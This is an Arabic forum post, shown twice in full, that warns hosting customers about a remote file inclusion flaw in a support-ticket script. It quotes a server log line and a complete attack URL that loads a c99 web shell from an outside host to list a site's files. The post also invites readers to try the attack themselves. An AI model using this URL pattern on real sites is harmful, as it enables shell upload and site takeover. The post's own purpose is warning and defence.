loulou ange
11-02-2013, بتوقيت غرينيتش 12:48 AM
السلام عليكم ورحمة الله وبركاته
منذ فترة قليلة .. أحد عملائنا من الريسيلرات كان علي موقعه سكربت الدعم الفني المعروف
[ سكربت بطاقات الدعم الفني ] (http://www.dzbatna.com/t5698/?highlight=%D3%DF%D1%C8%CA+%C7%E1%CF%DA%E3+%C7%E1% DD%E4%ED)
ثغرة في هذا السكربت تمكن المخترق من رفع شيل علي الموقع
*******************************
محاولة الاختراق تمت عن طريق سكربت الدعم الفني الموجود بالموقع وهذه المحاولة تضر بالموقع فقط ! وليس بالسيرفر SERVER كاملا ......ولا يستطيع بواسطة هذه الثغرة التأثير على اي موقع اخر ...واليكم عينة من ملفات اللوج :
196.218.164.188 - - [01/Nov/2014:02:35:54 +0200] "GET /support/include/open_form.php?include_dir=http%3A%2F%2Fr1s.cc%2Ffi le_in
clude%2Fc99.txt%3F&act=ls&d=%2Fhome%2Fuorontn%2Fpu blic_html%2F&sort=0a HTTP/1.1" 200 905 "-" "Mozilla/4.0 (compatible; MSIE 6.
0; ******s NT 5.1; SV1)"
للتأكد بنفسك من امكانية اختراق الموقع بسهولة عن طريق اسكربت الدعم الفني الفاشل ...http://www.xxxx.com/support/include/...tml%2F&sort=0a (http://www.xxxx.com/support/include/open_form.php?include_dir=http://crashz.by.ru/shell/c99.txt%3F&act=ls&d=%2Fhome%2Fuorontn%2Fpublic_html%2F&sort=0a)
في الرابط بالأعلي قام المخترق بإستخدام ملف شل من علي سيرفر SERVER آخر
فالسكربت مصاب بالعديد من الثغرات
فنرجو من الجميع الأنتهباه منه ! فهو يٌمكن االمٌخترق من رفع شل بكل سهولة !
سلام عليكم
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
منذ فترة قليلة .. أحد عملائنا من الريسيلرات كان علي موقعه سكربت الدعم الفني المعروف
[ سكربت بطاقات الدعم الفني ] (http://www.dzbatna.com/t5698/?highlight=%D3%DF%D1%C8%CA+%C7%E1%CF%DA%E3+%C7%E1% DD%E4%ED)
ثغرة في هذا السكربت تمكن المخترق من رفع شيل علي الموقع
*******************************
محاولة الاختراق تمت عن طريق سكربت الدعم الفني الموجود بالموقع وهذه المحاولة تضر بالموقع فقط ! وليس بالسيرفر SERVER كاملا ......ولا يستطيع بواسطة هذه الثغرة التأثير على اي موقع اخر ...واليكم عينة من ملفات اللوج :
196.218.164.188 - - [01/Nov/2014:02:35:54 +0200] "GET /support/include/open_form.php?include_dir=http%3A%2F%2Fr1s.cc%2Ffi le_in
clude%2Fc99.txt%3F&act=ls&d=%2Fhome%2Fuorontn%2Fpu blic_html%2F&sort=0a HTTP/1.1" 200 905 "-" "Mozilla/4.0 (compatible; MSIE 6.
0; ******s NT 5.1; SV1)"
للتأكد بنفسك من امكانية اختراق الموقع بسهولة عن طريق اسكربت الدعم الفني الفاشل ...http://www.xxxx.com/support/include/...tml%2F&sort=0a (http://www.xxxx.com/support/include/open_form.php?include_dir=http://crashz.by.ru/shell/c99.txt%3F&act=ls&d=%2Fhome%2Fuorontn%2Fpublic_html%2F&sort=0a)
في الرابط بالأعلي قام المخترق بإستخدام ملف شل من علي سيرفر SERVER آخر
فالسكربت مصاب بالعديد من الثغرات
فنرجو من الجميع الأنتهباه منه ! فهو يٌمكن االمٌخترق من رفع شل بكل سهولة !
سلام عليكم
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
